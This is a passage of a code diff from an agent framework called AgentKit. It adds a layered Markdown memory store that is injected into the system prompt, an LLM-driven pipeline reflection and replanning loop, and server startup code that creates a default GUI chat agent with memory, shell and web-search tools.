raise LLMProviderError("openai", f"HTTP {response.status_code}") # Parse error body for detailed message
try:
error_body = response.json()
error_msg = error_body.get("error", {}).get("message", f"HTTP {response.status_code}")
except Exception:
error_msg = f"HTTP {response.status_code}"
logger.error(f"Stream request failed: HTTP {response.status_code}, error: {error_msg}")
raise LLMProviderError("openai", f"HTTP {response.status_code}: {error_msg}")
return _StreamContext(response_ctx, response) return _StreamContext(response_ctx, response)

View File

@ -15,6 +15,7 @@ from agentkit.memory.query_transformer import (
TransformedQuery, TransformedQuery,
create_query_transformer, create_query_transformer,
) )
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
__all__ = [ __all__ = [
"Memory", "Memory",
@ -31,4 +32,7 @@ __all__ = [
"NoOpQueryTransformer", "NoOpQueryTransformer",
"TransformedQuery", "TransformedQuery",
"create_query_transformer", "create_query_transformer",
"MemoryFile",
"MemoryStore",
"MemorySnapshot",
] ]

View File

@ -0,0 +1,294 @@
"""分层记忆系统 — SOUL/USER/MEMORY/DAILY 文件管理.
参考 Hermes/OpenClaw 架构实现 Agent 人格用户档案工作笔记
日志的持久化存储与 system prompt 注入
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any
class MemoryFile:
"""单个记忆文件的管理器,支持 section 级别 CRUD 和容量控制.
文件格式为 Markdown使用 `## Section` 组织内容::
## 身份
我是小王一个专业的 AI 助手
## 性格
友好耐心注重细节
"""
def __init__(self, path: Path, char_budget: int | None = None):
self.path = Path(path)
self.char_budget = char_budget
def read(self) -> str:
"""读取整个文件内容,文件不存在返回空字符串."""
if not self.path.exists():
return ""
return self.path.read_text(encoding="utf-8")
def write(self, content: str) -> None:
"""写入内容,自动创建父目录,超容量时自动裁剪."""
self.path.parent.mkdir(parents=True, exist_ok=True)
self.path.write_text(content, encoding="utf-8")
if self.char_budget and len(content) > self.char_budget:
self.trim_to_budget()
def read_section(self, name: str) -> str:
"""读取指定 section 的内容(不含标题行)."""
content = self.read()
if not content:
return ""
# 匹配 ## name 后面的内容,直到下一个 ## 或文件末尾
pattern = rf"^## {re.escape(name)}\s*\n(.*?)(?=^## |\Z)"
match = re.search(pattern, content, re.MULTILINE | re.DOTALL)
if match:
return match.group(1).strip()
return ""
def add_section(self, name: str, content: str) -> None:
"""追加内容到指定 section不存在则创建."""
existing = self.read()
section_content = self.read_section(name)
if section_content:
# 追加到已有 section
old_text = section_content
new_text = f"{old_text}\n{content}"
self.replace_section(name, old_text, new_text)
else:
# 创建新 section
new_section = f"\n## {name}\n{content}"
if existing and not existing.endswith("\n"):
new_section = "\n" + new_section
self.write(existing + new_section)
def replace_section(self, name: str, old_text: str, new_text: str) -> bool:
"""替换 section 内的文本,返回是否成功."""
section_content = self.read_section(name)
if old_text not in section_content:
return False
full_content = self.read()
# 替换 section 内的文本
pattern = rf"(^## {re.escape(name)}\s*\n)(.*?)(?=^## |\Z)"
match = re.search(pattern, full_content, re.MULTILINE | re.DOTALL)
if not match:
return False
original_section_body = match.group(2)
new_section_body = original_section_body.replace(old_text, new_text, 1)
updated = full_content[: match.start(2)] + new_section_body + full_content[match.end(2) :]
self.write(updated)
return True
def remove_section(self, name: str) -> None:
"""删除整个 section含标题行."""
content = self.read()
if not content:
return
pattern = rf"^## {re.escape(name)}\s*\n.*?(?=^## |\Z)"
new_content = re.sub(pattern, "", content, flags=re.MULTILINE | re.DOTALL).strip()
self.write(new_content)
def list_sections(self) -> list[str]:
"""列出所有 section 名称."""
content = self.read()
if not content:
return []
return re.findall(r"^## (.+)$", content, re.MULTILINE)
def trim_to_budget(self) -> None:
"""裁剪内容到容量上限,优先保留前面的 section."""
if not self.char_budget:
return
content = self.read()
if len(content) <= self.char_budget:
return
# 从末尾裁剪,保留前面的 section
self.write(content[: self.char_budget])
@dataclass
class MemorySnapshot:
"""一次加载的所有记忆文件快照."""
soul: str = ""
user: str = ""
memory: str = ""
daily: str = ""
total_chars: int = 0
def is_empty(self) -> bool:
return not any([self.soul, self.user, self.memory, self.daily])
# 容量上限常量(字符数)
SOUL_BUDGET = 2000
USER_BUDGET = 1400
MEMORY_BUDGET = 2200
DAILY_BUDGET = 1000 # 每天日志上限
# 默认 SOUL.md 内容
DEFAULT_SOUL = """## 身份
我是 AgentKit一个专业的 AI 助手
## 性格
专业友好注重细节
## 说话方式
简洁清晰偶尔使用比喻帮助理解
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
class MemoryStore:
"""管理 SOUL/USER/MEMORY/DAILY 四类记忆文件.
存储路径::
base_dir/
SOUL.md
memories/
USER.md
MEMORY.md
daily/
2026-06-07.md
2026-06-08.md
"""
def __init__(self, base_dir: Path | str | None = None):
if base_dir is None:
base_dir = Path.home() / ".agentkit"
self.base_dir = Path(base_dir)
self.base_dir.mkdir(parents=True, exist_ok=True)
# 初始化四个 MemoryFile
self._soul = MemoryFile(self.base_dir / "SOUL.md", char_budget=SOUL_BUDGET)
self._user = MemoryFile(self.base_dir / "memories" / "USER.md", char_budget=USER_BUDGET)
self._memory = MemoryFile(self.base_dir / "memories" / "MEMORY.md", char_budget=MEMORY_BUDGET)
self._daily_dir = self.base_dir / "memories" / "daily"
self._daily_dir.mkdir(parents=True, exist_ok=True)
def get_file(self, file_key: str) -> MemoryFile:
"""获取指定类型的 MemoryFile.
Args:
file_key: "soul" | "user" | "memory" | "daily"
"""
mapping = {
"soul": self._soul,
"user": self._user,
"memory": self._memory,
}
if file_key in mapping:
return mapping[file_key]
if file_key == "daily":
# daily 返回今天的日志文件
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
return MemoryFile(self._daily_dir / f"{today}.md", char_budget=DAILY_BUDGET)
raise ValueError(f"Invalid file_key: {file_key}. Must be soul/user/memory/daily")
def ensure_defaults(self) -> None:
"""首次运行时创建默认 SOUL.md."""
if not self._soul.read():
self._soul.write(DEFAULT_SOUL.strip())
def load_all(self) -> MemorySnapshot:
"""加载所有记忆文件."""
soul = self._soul.read()
user = self._user.read()
memory = self._memory.read()
daily = self.load_daily_logs()
total = len(soul) + len(user) + len(memory) + len(daily)
return MemorySnapshot(
soul=soul,
user=user,
memory=memory,
daily=daily,
total_chars=total,
)
def load_daily_logs(self, days: int = 2) -> str:
"""加载最近 N 天的日志."""
parts: list[str] = []
for i in range(days):
from datetime import timedelta
date = datetime.now(timezone.utc) - timedelta(days=i)
filename = f"{date.strftime('%Y-%m-%d')}.md"
daily_file = MemoryFile(self._daily_dir / filename)
content = daily_file.read()
if content:
parts.append(f"### {date.strftime('%Y-%m-%d')}\n{content}")
return "\n\n".join(parts)
def archive_old_dailies(self, keep_days: int = 2) -> int:
"""归档超过 N 天的日志(删除旧文件)."""
from datetime import timedelta
count = 0
cutoff = datetime.now(timezone.utc) - timedelta(days=keep_days)
if not self._daily_dir.exists():
return 0
for f in self._daily_dir.glob("*.md"):
# 从文件名解析日期
try:
date_str = f.stem # e.g. "2026-06-07"
file_date = datetime.strptime(date_str, "%Y-%m-%d").replace(tzinfo=timezone.utc)
if file_date < cutoff:
f.unlink()
count += 1
except ValueError:
continue
return count
def build_system_prompt(self, snapshot: MemorySnapshot, base_prompt: str = "") -> str:
"""将记忆注入 system prompt.
格式::
<agent-identity>
[SOUL.md content]
</agent-identity>
<user-profile>
[USER.md content]
</user-profile>
<agent-notes>
[MEMORY.md content]
</agent-notes>
<recent-activity>
[DAILY.md content]
</recent-activity>
[base_prompt]
"""
parts: list[str] = []
if snapshot.soul:
parts.append(f"<agent-identity>\n{snapshot.soul}\n</agent-identity>")
if snapshot.user:
parts.append(f"<user-profile>\n{snapshot.user}\n</user-profile>")
if snapshot.memory:
parts.append(f"<agent-notes>\n{snapshot.memory}\n</agent-notes>")
if snapshot.daily:
parts.append(f"<recent-activity>\n{snapshot.daily}\n</recent-activity>")
if base_prompt:
parts.append(base_prompt)
return "\n\n".join(parts) if parts else base_prompt

View File

@ -1,6 +1,12 @@
"""AgentKit Orchestrator - 多 Agent 协同编排""" """AgentKit Orchestrator - 多 Agent 协同编排"""
from agentkit.orchestrator.pipeline_schema import Pipeline, PipelineStage, StageStatus from agentkit.orchestrator.pipeline_schema import (
Pipeline,
PipelineStage,
StageStatus,
AdaptiveConfig,
ReflectionReport,
)
from agentkit.orchestrator.pipeline_engine import PipelineEngine from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_loader import PipelineLoader from agentkit.orchestrator.pipeline_loader import PipelineLoader
from agentkit.orchestrator.handoff import HandoffManager from agentkit.orchestrator.handoff import HandoffManager
@ -17,11 +23,14 @@ from agentkit.orchestrator.compensation import (
CompensationResult, CompensationResult,
SagaOrchestrator, SagaOrchestrator,
) )
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
__all__ = [ __all__ = [
"Pipeline", "Pipeline",
"PipelineStage", "PipelineStage",
"StageStatus", "StageStatus",
"AdaptiveConfig",
"ReflectionReport",
"PipelineEngine", "PipelineEngine",
"PipelineLoader", "PipelineLoader",
"HandoffManager", "HandoffManager",
@ -35,4 +44,6 @@ __all__ = [
"CompletedStep", "CompletedStep",
"CompensationResult", "CompensationResult",
"SagaOrchestrator", "SagaOrchestrator",
"PipelineReflector",
"PipelineReplanner",
] ]

View File

@ -8,12 +8,15 @@ from typing import Any
from agentkit.orchestrator.compensation import SagaOrchestrator from agentkit.orchestrator.compensation import SagaOrchestrator
from agentkit.orchestrator.pipeline_schema import ( from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline, Pipeline,
PipelineResult, PipelineResult,
PipelineStage, PipelineStage,
ReflectionReport,
StageResult, StageResult,
StageStatus, StageStatus,
) )
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
from agentkit.orchestrator.retry import StepRetryPolicy, execute_with_retry from agentkit.orchestrator.retry import StepRetryPolicy, execute_with_retry
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
@ -32,16 +35,90 @@ class PipelineEngine:
- 状态持久化可选 - 状态持久化可选
""" """
def __init__(self, dispatcher: Any = None, state_manager: Any = None): def __init__(self, dispatcher: Any = None, state_manager: Any = None, llm_gateway: Any = None):
self._dispatcher = dispatcher self._dispatcher = dispatcher
self._state_manager = state_manager self._state_manager = state_manager
self._llm_gateway = llm_gateway
async def execute( async def execute(
self, self,
pipeline: Pipeline, pipeline: Pipeline,
context: dict[str, Any] | None = None, context: dict[str, Any] | None = None,
adaptive_config: AdaptiveConfig | None = None,
) -> PipelineResult: ) -> PipelineResult:
"""执行 Pipeline""" """执行 Pipeline
Args:
pipeline: Pipeline 定义
context: 运行时上下文变量
adaptive_config: 自适应配置启用反思-重规划闭环
"""
# First execution
result = await self._execute_pipeline(pipeline, context)
# If failed and adaptive is enabled, enter reflection-replanning loop
if result.status == StageStatus.FAILED and adaptive_config and adaptive_config.enabled:
result = await self._adaptive_loop(pipeline, context, result, adaptive_config)
return result
async def _adaptive_loop(
self,
pipeline: Pipeline,
context: dict[str, Any] | None,
failed_result: PipelineResult,
adaptive_config: AdaptiveConfig,
) -> PipelineResult:
"""反思-重规划闭环:分析失败原因 → 修正 Pipeline → 重新执行。"""
reflector = PipelineReflector(llm_gateway=self._llm_gateway)
replanner = PipelineReplanner(llm_gateway=self._llm_gateway)
current_pipeline = pipeline
current_result = failed_result
reflections: list[ReflectionReport] = []
for reflection_num in range(1, adaptive_config.max_reflections + 1):
# Reflect
report = await reflector.reflect(current_pipeline, current_result, reflection_num)
reflections.append(report)
logger.info(
f"Pipeline reflection #{reflection_num}: "
f"failure_type={report.failure_type}, "
f"root_cause={report.root_cause}"
)
# Replan
new_pipeline = await replanner.replan(current_pipeline, current_result, report)
logger.info(f"Pipeline replanned: {new_pipeline.name} ({len(new_pipeline.stages)} stages)")
# Re-execute
current_result = await self._execute_pipeline(new_pipeline, context)
current_pipeline = new_pipeline
# Record reflection in metadata
current_result.metadata["reflections"] = [
r.model_dump() for r in reflections
]
if current_result.status == StageStatus.COMPLETED:
logger.info(f"Pipeline succeeded after {reflection_num} reflection(s)")
return current_result
# Exhausted reflections
logger.warning(
f"Pipeline failed after {adaptive_config.max_reflections} reflection(s)"
)
current_result.metadata["reflections"] = [
r.model_dump() for r in reflections
]
return current_result
async def _execute_pipeline(
self,
pipeline: Pipeline,
context: dict[str, Any] | None = None,
) -> PipelineResult:
"""执行 Pipeline 的核心逻辑(不含反思-重规划)。"""
result = PipelineResult(pipeline_name=pipeline.name) result = PipelineResult(pipeline_name=pipeline.name)
result.variables = {**pipeline.variables, **(context or {})} result.variables = {**pipeline.variables, **(context or {})}

View File

@ -56,3 +56,25 @@ class PipelineResult(BaseModel):
stage_results: dict[str, StageResult] = {} stage_results: dict[str, StageResult] = {}
variables: dict[str, Any] = {} variables: dict[str, Any] = {}
error_message: str | None = None error_message: str | None = None
metadata: dict[str, Any] = {}
class AdaptiveConfig(BaseModel):
"""Configuration for adaptive pipeline execution with reflection-replanning."""
enabled: bool = False
max_reflections: int = 3
reflection_model: str = "default"
skip_stages: list[str] = []
model_config = {"arbitrary_types_allowed": True}
class ReflectionReport(BaseModel):
"""Structured report from pipeline reflection analysis."""
failure_type: str # input_error, resource_error, logic_error, timeout
root_cause: str
suggested_fix: str
failed_stage: str
reflection_number: int = 1

View File

@ -0,0 +1,370 @@
"""Pipeline 反思-重规划模块
Pipeline 执行失败时通过 LLM 反思分析失败原因
生成修正后的 Pipeline 重新执行
"""
import json
import logging
from typing import Any
from agentkit.orchestrator.pipeline_schema import (
Pipeline,
PipelineResult,
PipelineStage,
ReflectionReport,
StageResult,
StageStatus,
)
logger = logging.getLogger(__name__)
class PipelineReflector:
"""分析 Pipeline 执行失败原因,生成结构化反思报告。
使用 LLM 分析失败上下文哪步失败错误信息已完成步骤输出
输出 ReflectionReport 包含 failure_typeroot_cause suggested_fix
"""
def __init__(self, llm_gateway: Any = None):
self._llm_gateway = llm_gateway
async def reflect(
self,
pipeline: Pipeline,
result: PipelineResult,
reflection_number: int = 1,
) -> ReflectionReport:
"""分析失败原因并生成反思报告。
Args:
pipeline: 原始 Pipeline 定义
result: 执行失败的 PipelineResult
reflection_number: 当前是第几次反思
Returns:
ReflectionReport 结构化反思报告
"""
# 收集失败上下文
failed_stage, error_message = self._find_failure(result)
completed_outputs = self._collect_completed_outputs(result)
# 如果有 LLM Gateway使用 LLM 分析
if self._llm_gateway is not None:
try:
return await self._llm_reflect(
pipeline, failed_stage, error_message,
completed_outputs, reflection_number,
)
except Exception as e:
logger.warning(f"LLM reflection failed, falling back to rule-based: {e}")
# 规则兜底:基于错误信息分类
return self._rule_based_reflect(
failed_stage, error_message, reflection_number,
)
def _find_failure(
self, result: PipelineResult,
) -> tuple[str, str]:
"""找到第一个失败的 stage 及其错误信息。"""
for name, sr in result.stage_results.items():
if sr.status == StageStatus.FAILED:
return name, sr.error_message or "unknown error"
return "", "no failed stage found"
def _collect_completed_outputs(
self, result: PipelineResult,
) -> dict[str, Any]:
"""收集已完成步骤的输出。"""
outputs = {}
for name, sr in result.stage_results.items():
if sr.status == StageStatus.COMPLETED and sr.output_data:
outputs[name] = sr.output_data
return outputs
async def _llm_reflect(
self,
pipeline: Pipeline,
failed_stage: str,
error_message: str,
completed_outputs: dict[str, Any],
reflection_number: int,
) -> ReflectionReport:
"""使用 LLM 分析失败原因。"""
prompt = self._build_reflection_prompt(
pipeline, failed_stage, error_message,
completed_outputs, reflection_number,
)
response = await self._llm_gateway.chat(
messages=[{"role": "user", "content": prompt}],
model="default",
)
# 解析 LLM 返回的 JSON
content = response.content if hasattr(response, "content") else str(response)
return self._parse_reflection_response(
content, failed_stage, reflection_number,
)
def _build_reflection_prompt(
self,
pipeline: Pipeline,
failed_stage: str,
error_message: str,
completed_outputs: dict[str, Any],
reflection_number: int,
) -> str:
"""构建反思提示词。"""
stage_descriptions = []
for s in pipeline.stages:
stage_descriptions.append(
f" - {s.name}: agent={s.agent}, action={s.action}, "
f"depends_on={s.depends_on}"
)
completed_summary = json.dumps(
{k: str(v)[:200] for k, v in completed_outputs.items()},
ensure_ascii=False,
)
return f"""Analyze the following pipeline execution failure and provide a structured reflection report.
Pipeline: {pipeline.name}
Stages:
{chr(10).join(stage_descriptions)}
Failed stage: {failed_stage}
Error message: {error_message}
Completed outputs (summary): {completed_summary}
Reflection attempt: {reflection_number}
Respond in JSON format with these fields:
- failure_type: one of "input_error", "resource_error", "logic_error", "timeout"
- root_cause: brief description of the root cause
- suggested_fix: concrete fix to apply to the pipeline
JSON response:"""
def _parse_reflection_response(
self,
content: str,
failed_stage: str,
reflection_number: int,
) -> ReflectionReport:
"""解析 LLM 返回的反思报告。"""
# 尝试提取 JSON
try:
# 处理 markdown 代码块包裹的 JSON
text = content.strip()
if text.startswith("```"):
lines = text.split("\n")
text = "\n".join(lines[1:-1])
data = json.loads(text)
return ReflectionReport(
failure_type=data.get("failure_type", "logic_error"),
root_cause=data.get("root_cause", "LLM analysis unavailable"),
suggested_fix=data.get("suggested_fix", ""),
failed_stage=failed_stage,
reflection_number=reflection_number,
)
except (json.JSONDecodeError, KeyError) as e:
logger.warning(f"Failed to parse LLM reflection response: {e}")
return self._rule_based_reflect(
failed_stage, content, reflection_number,
)
def _rule_based_reflect(
self,
failed_stage: str,
error_message: str,
reflection_number: int,
) -> ReflectionReport:
"""基于规则的兜底反思。"""
error_lower = error_message.lower()
if "timeout" in error_lower or "timed out" in error_lower:
failure_type = "timeout"
root_cause = f"Stage '{failed_stage}' timed out"
suggested_fix = "Increase timeout_seconds and add retry_policy"
elif "not found" in error_lower or "404" in error_lower:
failure_type = "resource_error"
root_cause = f"Required resource not found in stage '{failed_stage}'"
suggested_fix = "Add pre-check step or adjust resource reference"
elif "invalid" in error_lower or "validation" in error_lower:
failure_type = "input_error"
root_cause = f"Invalid input to stage '{failed_stage}'"
suggested_fix = "Add input validation step before this stage"
else:
failure_type = "logic_error"
root_cause = f"Stage '{failed_stage}' failed: {error_message[:200]}"
suggested_fix = "Review stage logic and adjust action or inputs"
return ReflectionReport(
failure_type=failure_type,
root_cause=root_cause,
suggested_fix=suggested_fix,
failed_stage=failed_stage,
reflection_number=reflection_number,
)
class PipelineReplanner:
"""基于反思报告生成修正后的 Pipeline。
保留已完成步骤的结果仅重新规划失败及后续步骤
"""
def __init__(self, llm_gateway: Any = None):
self._llm_gateway = llm_gateway
async def replan(
self,
pipeline: Pipeline,
result: PipelineResult,
report: ReflectionReport,
) -> Pipeline:
"""基于反思报告重新规划 Pipeline。
Args:
pipeline: 原始 Pipeline
result: 执行失败的 PipelineResult
report: 反思报告
Returns:
修正后的 Pipeline
"""
# 如果有 LLM Gateway使用 LLM 重规划
if self._llm_gateway is not None:
try:
return await self._llm_replan(pipeline, result, report)
except Exception as e:
logger.warning(f"LLM replanning failed, falling back to rule-based: {e}")
# 规则兜底:基于 failure_type 调整
return self._rule_based_replan(pipeline, result, report)
async def _llm_replan(
self,
pipeline: Pipeline,
result: PipelineResult,
report: ReflectionReport,
) -> Pipeline:
"""使用 LLM 生成修正后的 Pipeline。"""
completed_stages = [
name for name, sr in result.stage_results.items()
if sr.status == StageStatus.COMPLETED
]
prompt = f"""Based on the reflection report, generate a corrected pipeline.
Original pipeline: {pipeline.name}
Stages: {[s.name for s in pipeline.stages]}
Completed stages: {completed_stages}
Failed stage: {report.failed_stage}
Failure type: {report.failure_type}
Root cause: {report.root_cause}
Suggested fix: {report.suggested_fix}
Generate a corrected pipeline in JSON format with the same structure as the original.
Only modify stages that need changes based on the reflection.
Keep completed stages unchanged.
JSON pipeline:"""
response = await self._llm_gateway.chat(
messages=[{"role": "user", "content": prompt}],
model="default",
)
content = response.content if hasattr(response, "content") else str(response)
return self._parse_pipeline_response(content, pipeline)
def _parse_pipeline_response(
self, content: str, original: Pipeline,
) -> Pipeline:
"""解析 LLM 返回的 Pipeline JSON。"""
try:
text = content.strip()
if text.startswith("```"):
lines = text.split("\n")
text = "\n".join(lines[1:-1])
data = json.loads(text)
stages = [
PipelineStage(**s) for s in data.get("stages", [])
]
return Pipeline(
name=data.get("name", original.name),
version=data.get("version", original.version),
description=data.get("description", original.description),
stages=stages,
variables=data.get("variables", original.variables),
)
except (json.JSONDecodeError, Exception) as e:
logger.warning(f"Failed to parse LLM replan response: {e}")
return original
def _rule_based_replan(
self,
pipeline: Pipeline,
result: PipelineResult,
report: ReflectionReport,
) -> Pipeline:
"""基于规则的兜底重规划。"""
completed_stages = {
name for name, sr in result.stage_results.items()
if sr.status == StageStatus.COMPLETED
}
# 构建修正后的 stages 列表
new_stages: list[PipelineStage] = []
for stage in pipeline.stages:
if stage.name in completed_stages:
# 已完成的步骤保持不变,但标记为 continue_on_failure
# 因为它们的结果已经存在
new_stages.append(stage)
elif stage.name == report.failed_stage:
# 失败步骤:根据 failure_type 调整
modified = self._adjust_failed_stage(stage, report)
new_stages.append(modified)
else:
# 后续步骤保持不变
new_stages.append(stage)
return Pipeline(
name=f"{pipeline.name}_replanned",
version=pipeline.version,
description=f"Replanned after reflection: {report.root_cause}",
stages=new_stages,
variables=pipeline.variables,
)
def _adjust_failed_stage(
self, stage: PipelineStage, report: ReflectionReport,
) -> PipelineStage:
"""根据反思报告调整失败的步骤。"""
adjustments: dict[str, Any] = {}
if report.failure_type == "timeout":
adjustments["timeout_seconds"] = min(
stage.timeout_seconds * 2, 3600,
)
if stage.retry_policy is None:
from agentkit.orchestrator.retry import StepRetryPolicy
adjustments["retry_policy"] = StepRetryPolicy(max_attempts=2)
elif report.failure_type == "resource_error":
adjustments["continue_on_failure"] = True
elif report.failure_type == "input_error":
# 添加重试策略,可能输入在后续可用
if stage.retry_policy is None:
from agentkit.orchestrator.retry import StepRetryPolicy
adjustments["retry_policy"] = StepRetryPolicy(max_attempts=2)
return stage.model_copy(update=adjustments)

View File

@ -21,7 +21,7 @@ from agentkit.skills.base import Skill, SkillConfig
from agentkit.skills.registry import SkillRegistry from agentkit.skills.registry import SkillRegistry
from agentkit.tools.registry import ToolRegistry from agentkit.tools.registry import ToolRegistry
from agentkit.server.config import ServerConfig from agentkit.server.config import ServerConfig
from agentkit.server.routes import agents, tasks, skills, llm, health, metrics, ws, evolution, memory, portal, evolution_dashboard, kb_management, skill_management, workflows from agentkit.server.routes import agents, tasks, skills, llm, health, metrics, ws, evolution, memory, portal, evolution_dashboard, kb_management, skill_management, workflows, chat
from agentkit.server.middleware import APIKeyAuthMiddleware, RateLimitMiddleware from agentkit.server.middleware import APIKeyAuthMiddleware, RateLimitMiddleware
from agentkit.server.task_store import create_task_store from agentkit.server.task_store import create_task_store
from agentkit.server.runner import BackgroundRunner from agentkit.server.runner import BackgroundRunner
@ -96,6 +96,106 @@ async def lifespan(app: FastAPI):
if mcp_manager is not None: if mcp_manager is not None:
await mcp_manager.start_all() await mcp_manager.start_all()
# In GUI mode, ensure a default chat agent exists with memory + tools
gui_mode = os.environ.get("AGENTKIT_GUI_MODE")
if gui_mode and not app.state.agent_pool.list_agents():
from agentkit.core.config_driven import AgentConfig
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
from agentkit.tools.shell import ShellTool
from agentkit.tools.web_search import WebSearchTool
from agentkit.tools.web_crawl import WebCrawlTool
from agentkit.tools.baidu_search import BaiduSearchTool
# Initialize memory store and build system prompt
memory_store = MemoryStore()
memory_store.ensure_defaults()
memory_snapshot = memory_store.load_all()
base_prompt = (
"你是一个有帮助的AI助手。请记住我们对话的上下文并在后续对话中引用之前的内容。回答要清晰简洁请使用中文回复。\n\n"
"重要提示:当你不确定事实信息、时事新闻或任何你不确信的话题时,"
"你必须先使用搜索工具查找准确和最新的信息,然后再回答。"
"中文内容优先使用 baidu_search 工具,英文/国际内容使用 web_search。"
"在能够搜索到真相的情况下,绝不猜测或编造答案。"
"始终优先搜索而不是给出可能不正确的信息。"
)
effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)
# Store memory_store on app.state for chat routes to use
app.state.memory_store = memory_store
default_config = AgentConfig(
name="default",
agent_type="chat",
task_mode="llm_generate",
description="Default chat agent for GUI",
prompt={"system": effective_system_prompt},
)
try:
agent = await app.state.agent_pool.create_agent(default_config)
# Register tools into the agent's tool registry
search_api_keys = {
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
"serper_api_key": os.environ.get("SERPER_API_KEY"),
}
agent._tool_registry.register(MemoryTool(memory_store=memory_store))
agent._tool_registry.register(ShellTool(working_dir=os.getcwd()))
agent._tool_registry.register(BaiduSearchTool())
agent._tool_registry.register(WebSearchTool(**search_api_keys))
agent._tool_registry.register(WebCrawlTool())
# Override system prompt with memory-injected version
agent._system_prompt = effective_system_prompt
logger.info("GUI mode: created default chat agent with memory + tools")
except Exception as e:
logger.warning(f"GUI mode: failed to create default agent: {e}")
# Load skills from config and register into SkillRegistry
try:
from agentkit.skills.loader import SkillLoader
skill_registry = app.state.skill_registry
tool_registry = app.state.tool_registry
# Register GUI tools into the shared tool registry so skills can bind them
for tool in agent._tool_registry.list_tools():
try:
tool_registry.register(tool)
except Exception:
pass # Already registered
# Load skills from configured paths
server_config = getattr(app.state, "server_config", None)
if server_config and server_config.skill_paths:
loader = SkillLoader(
skill_registry=skill_registry,
tool_registry=tool_registry,
)
for skill_path in server_config.skill_paths:
from pathlib import Path as _P
p = _P(skill_path)
if p.is_dir():
loaded = loader.load_from_directory(str(p))
logger.info(f"GUI mode: loaded {len(loaded)} skills from {p}")
elif p.is_file() and p.suffix in (".yaml", ".yml"):
try:
loader.load_from_file(str(p))
logger.info(f"GUI mode: loaded skill from {p}")
except Exception as se:
logger.warning(f"GUI mode: failed to load skill from {p}: {se}")
logger.info(f"GUI mode: {len(skill_registry.list_skills())} skills registered")
except Exception as e:
logger.warning(f"GUI mode: failed to load skills: {e}")
elif gui_mode:
# Agent already exists (e.g. from config), still ensure memory store is available
if not hasattr(app.state, "memory_store") or app.state.memory_store is None:
from agentkit.memory.profile import MemoryStore
memory_store = MemoryStore()
memory_store.ensure_defaults()
app.state.memory_store = memory_store
yield yield
# Shutdown # Shutdown
@ -151,6 +251,24 @@ def _on_config_change(app: FastAPI, config: ServerConfig) -> None:
# Reload skills if skill paths changed # Reload skills if skill paths changed
try: try:
new_skill_registry = _build_skill_registry(config) new_skill_registry = _build_skill_registry(config)
# Re-bind tools from the shared tool_registry so skills don't lose their bindings
tool_registry = getattr(app.state, "tool_registry", None)
if tool_registry:
from agentkit.skills.loader import SkillLoader
loader = SkillLoader(
skill_registry=new_skill_registry,
tool_registry=tool_registry,
)
for skill_path in (config.skill_paths or []):
from pathlib import Path as _P
p = _P(skill_path)
if p.is_dir():
loader.load_from_directory(str(p))
elif p.is_file() and p.suffix in (".yaml", ".yml"):
try:
loader.load_from_file(str(p))
except Exception:
pass
app.state.skill_registry = new_skill_registry app.state.skill_registry = new_skill_registry
if hasattr(app.state, "agent_pool") and app.state.agent_pool is not None: if hasattr(app.state, "agent_pool") and app.state.agent_pool is not None:
app.state.agent_pool._skill_registry = new_skill_registry app.state.agent_pool._skill_registry = new_skill_registry
@ -191,6 +309,20 @@ def create_app(
if server_config is None: if server_config is None:
config_path = os.environ.get("AGENTKIT_CONFIG_PATH") config_path = os.environ.get("AGENTKIT_CONFIG_PATH")
if config_path and os.path.exists(config_path): if config_path and os.path.exists(config_path):
# Load .env before parsing config (so ${ENV_VAR} substitutions work)
from pathlib import Path as _P
_dotenv = _P(config_path).parent / ".env"
if _dotenv.exists():
with open(_dotenv, encoding="utf-8") as _f:
for _line in _f:
_line = _line.strip()
if not _line or _line.startswith("#") or "=" not in _line:
continue
_key, _, _val = _line.partition("=")
_key = _key.strip()
_val = _val.strip().strip("\"'")
if _key and _key not in os.environ:
os.environ[_key] = _val
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
app = FastAPI(title="AgentKit Server", version="2.0.0", lifespan=lifespan) app = FastAPI(title="AgentKit Server", version="2.0.0", lifespan=lifespan)
@ -271,11 +403,23 @@ def create_app(
logger.info("HeadroomRetrieveTool registered (CCR retrieval enabled)") logger.info("HeadroomRetrieveTool registered (CCR retrieval enabled)")
except ImportError: except ImportError:
pass pass
# Initialize MessageBus for inter-agent communication
from agentkit.bus.redis_bus import create_message_bus
bus_config = {}
if server_config and hasattr(server_config, "bus") and server_config.bus:
bus_config = server_config.bus
message_bus = create_message_bus(
backend=bus_config.get("backend", "memory"),
redis_url=bus_config.get("redis_url", "redis://localhost:6379/0"),
)
app.state.message_bus = message_bus
app.state.agent_pool = AgentPool( app.state.agent_pool = AgentPool(
llm_gateway=app.state.llm_gateway, llm_gateway=app.state.llm_gateway,
skill_registry=app.state.skill_registry, skill_registry=app.state.skill_registry,
tool_registry=app.state.tool_registry, tool_registry=app.state.tool_registry,
compressor=compressor, compressor=compressor,
message_bus=message_bus,
) )
app.state.intent_router = IntentRouter(llm_gateway=app.state.llm_gateway) app.state.intent_router = IntentRouter(llm_gateway=app.state.llm_gateway)
app.state.quality_gate = QualityGate() app.state.quality_gate = QualityGate()
@ -301,6 +445,21 @@ def create_app(
app.state.server_config = server_config app.state.server_config = server_config
app.state.api_key = effective_api_key app.state.api_key = effective_api_key
# Initialize session manager for Chat mode
from agentkit.session.manager import SessionManager
from agentkit.session.store import create_session_store
session_config = {}
if server_config and hasattr(server_config, "session") and server_config.session:
session_config = server_config.session
# GUI mode defaults to file-backed sessions for persistence
session_backend = session_config.get("backend", "file" if os.environ.get("AGENTKIT_GUI_MODE") else "memory")
session_store = create_session_store(
backend=session_backend,
redis_url=session_config.get("redis_url", "redis://localhost:6379/0"),
ttl_seconds=session_config.get("ttl_seconds", 86400),
)
